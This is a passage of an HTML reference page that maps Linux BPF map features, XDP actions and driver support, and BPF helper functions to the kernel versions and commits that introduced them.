<tr><td><code>LOOKUP_AND_DELETE_ELEM</code></td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/bd513cd08f10cbe28856f99ae951e86e86803861"><code>bd513cd08f10</code></a></td></tr>
|
||
<tr><td>Creation: <code>BPF_F_ZERO_SEED</code></td><td>5.0</td><td><a href="https://github.com/torvalds/linux/commit/96b3b6c9091d23289721350e32c63cc8749686be"><code>96b3b6c9091d</code></a></td></tr>
|
||
<tr><td><code>BPF_F_LOCK</code> flag for lookup / update</td><td>5.1</td><td><a href="https://github.com/torvalds/linux/commit/96049f3afd50fe8db69fa0068cdca822e747b1e4"><code>96049f3afd50</code></a></td></tr>
|
||
<tr><td>Restrict access from BPF side</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/591fe9888d7809d9ee5c828020b6c6ae27c37229"><code>591fe9888d78</code></a></td></tr>
|
||
<tr><td><code>FREEZE</code></td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/87df15de441bd4add7876ef584da8cabdd9a042a"><code>87df15de441b</code></a></td></tr>
|
||
<tr><td>mmap() support for array maps</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/fc9702273e2edb90400a34b3be76f7b08fa3344b"><code>fc9702273e2e</code></a></td></tr>
|
||
<tr><td><code>LOOKUP_BATCH</code></td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/cb4d03ab499d4c040f4ab6fd4389d2b49f42b5a5"><code>cb4d03ab499d</code></a></td></tr>
|
||
<tr><td><code>UPDATE_BATCH</code>, <code>DELETE_BATCH</code></td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/aa2e93b8e58e18442edfb2427446732415bc215e"><code>aa2e93b8e58e</code></a></td></tr>
|
||
<tr><td><code>LOOKUP_AND_DELETE_BATCH</code></td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/057996380a42bb64ccc04383cfa9c0ace4ea11f0"><code>057996380a42</code></a></td></tr>
|
||
<tr><td><code>LOOKUP_AND_DELETE_ELEM</code> support for hash maps</td><td>5.14</td><td><a href="https://github.com/torvalds/linux/commit/3e87f192b405960c0fe83e0925bd0dadf4f8cf43"><code>3e87f192b405</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h2 id="xdp"><a class="header" href="#xdp">XDP</a></h2>
|
||
<p>An approximate list of drivers or components supporting XDP programs for your
|
||
kernel can be retrieved with:</p>
|
||
<pre><code class="language-sh">git grep -l XDP_SETUP_PROG drivers/
|
||
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Feature / Driver</th><th>Kernel version</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td>XDP core architecture</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6a773a15a1e8874e5eccd2f29190c31085912c95"><code>6a773a15a1e8</code></a></td></tr>
|
||
<tr><td>Action: drop</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6a773a15a1e8874e5eccd2f29190c31085912c95"><code>6a773a15a1e8</code></a></td></tr>
|
||
<tr><td>Action: pass on to stack</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6a773a15a1e8874e5eccd2f29190c31085912c95"><code>6a773a15a1e8</code></a></td></tr>
|
||
<tr><td>Action: direct forwarding (on same port)</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6ce96ca348a9e949f8c43f4d3e98db367d93cffd"><code>6ce96ca348a9</code></a></td></tr>
|
||
<tr><td>Direct packet data write</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/4acf6c0b84c91243c705303cd9ff16421914150d"><code>4acf6c0b84c9</code></a></td></tr>
|
||
<tr><td>Mellanox <code>mlx4</code> driver</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/47a38e155037f417c5740e24ccae6482aedf4b68"><code>47a38e155037</code></a></td></tr>
|
||
<tr><td>Mellanox <code>mlx5</code> driver</td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/86994156c736978d113e7927455d4eeeb2128b9f"><code>86994156c736</code></a></td></tr>
|
||
<tr><td>Netronome <code>nfp</code> driver</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/ecd63a0217d5f1e8a92f7516f5586d1177b95de2"><code>ecd63a0217d5</code></a></td></tr>
|
||
<tr><td>QLogic (Cavium) <code>qed*</code> drivers</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/496e051709588f832d7a6a420f44f8642b308a87"><code>496e05170958</code></a></td></tr>
|
||
<tr><td><code>virtio_net</code> driver</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/f600b690501550b94e83e07295d9c8b9c4c39f4e"><code>f600b6905015</code></a></td></tr>
|
||
<tr><td>Broadcom <code>bnxt_en</code> driver</td><td>4.11</td><td><a href="https://github.com/torvalds/linux/commit/c6d30e8391b85e00eb544e6cf047ee0160ee9938"><code>c6d30e8391b8</code></a></td></tr>
|
||
<tr><td>Intel <code>ixgbe*</code> drivers</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/9247080816297de4e31abb684939c0e53e3a8a67"><code>924708081629</code></a></td></tr>
|
||
<tr><td>Cavium <code>thunderx</code> driver</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/05c773f52b96ef3fbc7d9bfa21caadc6247ef7a8"><code>05c773f52b96</code></a></td></tr>
|
||
<tr><td>Generic XDP</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/b5cdae3291f7be7a34e75affe4c0ec1f7f328b64"><code>b5cdae3291f7</code></a></td></tr>
|
||
<tr><td>Intel <code>i40e</code> driver</td><td>4.13</td><td><a href="https://github.com/torvalds/linux/commit/0c8493d90b6bb0f5c4fe9217db8f7203f24c0f28"><code>0c8493d90b6b</code></a></td></tr>
|
||
<tr><td>Action: redirect</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/6453073987ba392510ab6c8b657844a9312c67f7"><code>6453073987ba</code></a></td></tr>
|
||
<tr><td>Support for tap</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/761876c857cb2ef8489fbee01907151da902af91"><code>761876c857cb</code></a></td></tr>
|
||
<tr><td>Support for veth</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/d445516966dcb2924741b13b27738b54df2af01a"><code>d445516966dc</code></a></td></tr>
|
||
<tr><td>Intel <code>ixgbevf</code> driver</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/c7aec59657b60f3a29fc7d3274ebefd698879301"><code>c7aec59657b6</code></a></td></tr>
|
||
<tr><td>Freescale <code>dpaa2</code> driver</td><td>5.0</td><td><a href="https://github.com/torvalds/linux/commit/7e273a8ebdd3b83f94eb8b49fc8ee61464f47cc2"><code>7e273a8ebdd3</code></a></td></tr>
|
||
<tr><td>Socionext <code>netsec</code> driver</td><td>5.3</td><td><a href="https://github.com/torvalds/linux/commit/ba2b232108d3c2951bab02930a00f23b0cffd5af"><code>ba2b232108d3</code></a></td></tr>
|
||
<tr><td>TI <code>cpsw</code> driver</td><td>5.3</td><td><a href="https://github.com/torvalds/linux/commit/9ed4050c0d75768066a07cf66eef4f8dc9d79b52"><code>9ed4050c0d75</code></a></td></tr>
|
||
<tr><td>Intel <code>ice</code> driver</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/efc2214b6047b6f5b4ca53151eba62521b9452d6"><code>efc2214b6047</code></a></td></tr>
|
||
<tr><td>Solarflare <code>sfc</code> driver</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/eb9a36be7f3ec414700af9a616f035eda1f1e63e"><code>eb9a36be7f3e</code></a></td></tr>
|
||
<tr><td>Marvell <code>mvneta</code> driver</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/0db51da7a8e99f0803ec3a8e25c1a66234a219cb"><code>0db51da7a8e9</code></a></td></tr>
|
||
<tr><td>Microsoft <code>hv_netvsc</code> driver</td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/351e1581395fcc7fb952bbd7dda01238f69968fd"><code>351e1581395f</code></a></td></tr>
|
||
<tr><td>Amazon <code>ena</code> driver</td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/838c93dc5449e5d6378bae117b0a65a122cf7361"><code>838c93dc5449</code></a></td></tr>
|
||
<tr><td><code>xen-netfront</code> driver</td><td>5.9</td><td><a href="https://github.com/torvalds/linux/commit/6c5aa6fc4defc2a0977a2c59e4710d50fa1e834c"><code>6c5aa6fc4def</code></a></td></tr>
|
||
<tr><td>Intel <code>igb</code> driver</td><td>5.10</td><td><a href="https://github.com/torvalds/linux/commit/9cbc948b5a20c9c054d9631099c0426c16da546b"><code>9cbc948b5a20</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h2 id="helpers"><a class="header" href="#helpers">Helpers</a></h2>
|
||
<p>The list of helpers supported in your kernel can be found in file
|
||
<a href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/bpf.h"><code>include/uapi/linux/bpf.h</code></a>:</p>
|
||
<pre><code class="language-sh">git grep ' FN(' include/uapi/linux/bpf.h
|
||
</code></pre>
|
||
<p>Alphabetical order</p>
|
||
<div class="table-wrapper"><table><thead><tr><th>Helper</th><th>Kernel version</th><th>License</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td><code>BPF_FUNC_bind()</code></td><td>4.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d74bad4e74ee373787a9ae24197c17b7cdc428d5"><code>d74bad4e74ee</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_bprm_opts_set()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3f6719c7b62f0327c9091e26d0da10e65668229e"><code>3f6719c7b62f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_btf_find_by_name_kind()</code></td><td>5.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3d78417b60fba249cc555468cb72d96f5cde2964"><code>3d78417b60fb</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_cgrp_storage_delete()</code></td><td>6.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c4bcfb38a95edb1021a53f2d0356a78120ecfbe4"><code>c4bcfb38a95e</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_cgrp_storage_get()</code></td><td>6.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c4bcfb38a95edb1021a53f2d0356a78120ecfbe4"><code>c4bcfb38a95e</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_check_mtu()</code></td><td>5.12</td><td></td><td><a href="https://github.com/torvalds/linux/commit/34b2021cc61642d61c3cf943d9e71925b827941b"><code>34b2021cc616</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_clone_redirect()</code></td><td>4.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3896d655f4d491c67d669a15f275a39f713410f8"><code>3896d655f4d4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_copy_from_user()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/07be4c4a3e7a0db148e44b16c5190e753d1c8569"><code>07be4c4a3e7a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_copy_from_user_task()</code></td><td>5.18</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/376040e47334c6dc6a939a32197acceb00fe4acf"><code>376040e47334</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_csum_diff()</code></td><td>4.6</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7d672345ed295b1356a5d9f7111da1d1d7d65867"><code>7d672345ed29</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_csum_level()</code></td><td>5.7</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7cdec54f9713256bb170873a1fc5c75c9127c9d2"><code>7cdec54f9713</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_csum_update()</code></td><td>4.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/36bbef52c7eb646ed6247055a2acd3851e317857"><code>36bbef52c7eb</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_current_task_under_cgroup()</code></td><td>4.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/60d20f9195b260bdf0ac10c275ae9f6016f9c069"><code>60d20f9195b2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_d_path()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6e22ab9da79343532cd3cde39df25e5a5478c692"><code>6e22ab9da793</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_dynptr_data()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/34d4ef5775f776ec4b0d53a02d588bf3195cada6"><code>34d4ef5775f7</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_dynptr_from_mem()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/263ae152e96253f40c2c276faad8629e096b3bad"><code>263ae152e962</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_dynptr_read()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/13bbbfbea7598ea9f8d9c3d73bf053bb57f9c4b2"><code>13bbbfbea759</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_dynptr_write()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/13bbbfbea7598ea9f8d9c3d73bf053bb57f9c4b2"><code>13bbbfbea759</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_fib_lookup()</code></td><td>4.18</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/87f5fc7e48dd3175b30dd03b41564e1a8e136323"><code>87f5fc7e48dd</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_find_vma()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7c7e3d31e7856a8260a254f8c71db416f7f9f5a1"><code>7c7e3d31e785</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_for_each_map_elem()</code></td><td>5.13</td><td></td><td><a href="https://github.com/torvalds/linux/commit/69c087ba6225b574afb6e505b72cb75242a3d844"><code>69c087ba6225</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_attach_cookie()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7adfc6c9b315e174cf8743b21b7b691c8766791b"><code>7adfc6c9b315</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_branch_snapshot()</code></td><td>5.16</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/856c02dbce4f8d6a5644083db22c11750aa11481"><code>856c02dbce4f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_ancestor_cgroup_id()</code></td><td>5.6</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b4490c5c4e023f09b7d27c9a9d3e7ad7d09ea6bf"><code>b4490c5c4e02</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_cgroup_classid()</code></td><td>4.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8d20aabe1c76cccac544d9fcc3ad7823d9e98a2d"><code>8d20aabe1c76</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_cgroup_id()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/bf6fa2c893c5237b48569a13fa3c673041430b6c"><code>bf6fa2c893c5</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_comm()</code></td><td>4.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/ffeedafbf0236f03aeb2e8db273b3e5ae5f5bc89"><code>ffeedafbf023</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_pid_tgid()</code></td><td>4.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/ffeedafbf0236f03aeb2e8db273b3e5ae5f5bc89"><code>ffeedafbf023</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_task()</code></td><td>4.8</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/606274c5abd8e245add01bc7145a8cbb92b69ba8"><code>606274c5abd8</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_task_btf()</code></td><td>5.11</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/3ca1032ab7ab010eccb107aa515598788f7d93bb"><code>3ca1032ab7ab</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_uid_gid()</code></td><td>4.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/ffeedafbf0236f03aeb2e8db273b3e5ae5f5bc89"><code>ffeedafbf023</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_func_arg()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f92c1e183604c20ce00eb889315fdaa8f2d9e509"><code>f92c1e183604</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_func_arg_cnt()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f92c1e183604c20ce00eb889315fdaa8f2d9e509"><code>f92c1e183604</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_func_ip()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/5d8b583d04aedb3bd5f6d227a334c210c7d735f9"><code>5d8b583d04ae</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_func_ret()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f92c1e183604c20ce00eb889315fdaa8f2d9e509"><code>f92c1e183604</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_retval()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b44123b4a3dcad4664d3a0f72c011ffd4c9c4d93"><code>b44123b4a3dc</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_hash_recalc()</code></td><td>4.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/13c5c240f789bbd2bcacb14a23771491485ae61f"><code>13c5c240f789</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_listener_sock()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/dbafd7ddd62369b2f3926ab847cbf8fc40e800b7"><code>dbafd7ddd623</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_local_storage()</code></td><td>4.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/cd3394317653837e2eb5c5d0904a8996102af9fc"><code>cd3394317653</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_netns_cookie()</code></td><td>5.7</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f318903c0bf42448b4c884732df2bbb0ef7a2284"><code>f318903c0bf4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_ns_current_pid_tgid()</code></td><td>5.7</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b4490c5c4e023f09b7d27c9a9d3e7ad7d09ea6bf"><code>b4490c5c4e02</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_numa_node_id()</code></td><td>4.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/2d0e30c30f84d08dc16f0f2af41f1b8a85f0755e"><code>2d0e30c30f84</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_prandom_u32()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/03e69b508b6f7c51743055c9f61d1dfeadf4b635"><code>03e69b508b6f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_route_realm()</code></td><td>4.4</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c46646d0484f5d08e2bede9b45034ba5b8b489cc"><code>c46646d0484f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_smp_processor_id()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c04167ce2ca0ecaeaafef006cb0d65cf01b68e42"><code>c04167ce2ca0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_socket_cookie()</code></td><td>4.12</td><td></td><td><a href="https://github.com/torvalds/linux/commit/91b8270f2a4d1d9b268de90451cdca63a70052d6"><code>91b8270f2a4d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_socket_uid()</code></td><td>4.12</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6acc5c2910689fc6ee181bf63085c5efff6a42bd"><code>6acc5c291068</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_stack()</code></td><td>4.18</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/de2ff05f48afcde816ff4edb217417f62f624ab5"><code>de2ff05f48af</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_stackid()</code></td><td>4.6</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/d5a3b1f691865be576c2bffa708549b8cdccda19"><code>d5a3b1f69186</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_task_stack()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/fa28dcb82a38f8e3993b0fae9106b1a80b59e4f0"><code>fa28dcb82a38</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_getsockopt()</code></td><td>4.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/cd86d1fd21025fdd6daf23d1288da405e7ad0ec6"><code>cd86d1fd2102</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ima_file_hash()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/174b16946e39ebd369097e0f773536c91a8c1a4c"><code>174b16946e39</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ima_inode_hash()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/27672f0d280a3f286a410a8db2004f46ace72a17"><code>27672f0d280a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_inode_storage_delete()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8ea636848aca35b9f97c5b5dee30225cf2dd0fe6"><code>8ea636848aca</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_inode_storage_get()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8ea636848aca35b9f97c5b5dee30225cf2dd0fe6"><code>8ea636848aca</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_jiffies64()</code></td><td>5.5</td><td></td><td><a href="https://github.com/torvalds/linux/commit/5576b991e9c1a11d2cc21c4b94fc75ec27603896"><code>5576b991e9c1</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_kallsyms_lookup_name()</code></td><td>5.16</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d6aef08a872b9e23eecc92d0e92393473b13c497"><code>d6aef08a872b</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_kptr_xchg()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c0a5a21c25f37c9fd7b36072f9968cdff1e4aa13"><code>c0a5a21c25f3</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ktime_get_boot_ns()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/71d19214776e61b33da48f7c1b46e522c7f78221"><code>71d19214776e</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ktime_get_coarse_ns()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d055126180564a57fe533728a4e93d0cb53d49b3"><code>d05512618056</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ktime_get_ns()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d9847d310ab4003725e6ed1822682e24bd406908"><code>d9847d310ab4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ktime_get_tai_ns()</code></td><td>6.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c8996c98f703b09afe77a1d247dae691c9849dc1"><code>c8996c98f703</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_l3_csum_replace()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/91bc4822c3d61b9bb7ef66d3b77948a4f9177954"><code>91bc4822c3d6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_l4_csum_replace()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/91bc4822c3d61b9bb7ef66d3b77948a4f9177954"><code>91bc4822c3d6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_load_hdr_opt()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/0813a841566f0962a5551be7749b43c45f0022a0"><code>0813a841566f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_loop()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/e6f2dd0f80674e9d5960337b3e9c2a242441b326"><code>e6f2dd0f8067</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_lwt_push_encap()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/fe94cc290f535709d3c5ebd1e472dfd0aec7ee79"><code>fe94cc290f53</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_lwt_seg6_action()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/fe94cc290f535709d3c5ebd1e472dfd0aec7ee79"><code>fe94cc290f53</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_lwt_seg6_adjust_srh()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/fe94cc290f535709d3c5ebd1e472dfd0aec7ee79"><code>fe94cc290f53</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_lwt_seg6_store_bytes()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/fe94cc290f535709d3c5ebd1e472dfd0aec7ee79"><code>fe94cc290f53</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_delete_elem()</code></td><td>3.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d0003ec01c667b731c139e23de3306a8b328ccf5"><code>d0003ec01c66</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_lookup_elem()</code></td><td>3.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d0003ec01c667b731c139e23de3306a8b328ccf5"><code>d0003ec01c66</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_lookup_percpu_elem()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/07343110b293456d30393e89b86c4dee1ac051c8"><code>07343110b293</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_peek_elem()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92"><code>f1a2e44a3aec</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_pop_elem()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92"><code>f1a2e44a3aec</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_push_elem()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92"><code>f1a2e44a3aec</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_update_elem()</code></td><td>3.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d0003ec01c667b731c139e23de3306a8b328ccf5"><code>d0003ec01c66</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_apply_bytes()</code></td><td>4.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/2a100317c9ebc204a166f16294884fbf9da074ce"><code>2a100317c9eb</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_cork_bytes()</code></td><td>4.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/91843d540a139eb8070bcff8aa10089164436deb"><code>91843d540a13</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_pop_data()</code></td><td>5.0</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7246d8ed4dcce23f7509949a77be15fa9f0e3d28"><code>7246d8ed4dcc</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_pull_data()</code></td><td>4.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/015632bb30daaaee64e1bcac07570860e0bf3092"><code>015632bb30da</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_push_data()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6fff607e2f14bd7c63c06c464a6f93b8efbabe28"><code>6fff607e2f14</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_redirect_hash()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/81110384441a59cff47430f20f049e69b98c17f4"><code>81110384441a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_redirect_map()</code></td><td>4.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4f738adba30a7cfc006f605707e7aee847ffefa0"><code>4f738adba30a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_per_cpu_ptr()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/eaa6bcb71ef6ed3dc18fc525ee7e293b06b4882b"><code>eaa6bcb71ef6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_perf_event_output()</code></td><td>4.4</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/a43eec304259a6c637f4014a6d4767159b6a3aa3"><code>a43eec304259</code></a></td></tr>
|
||
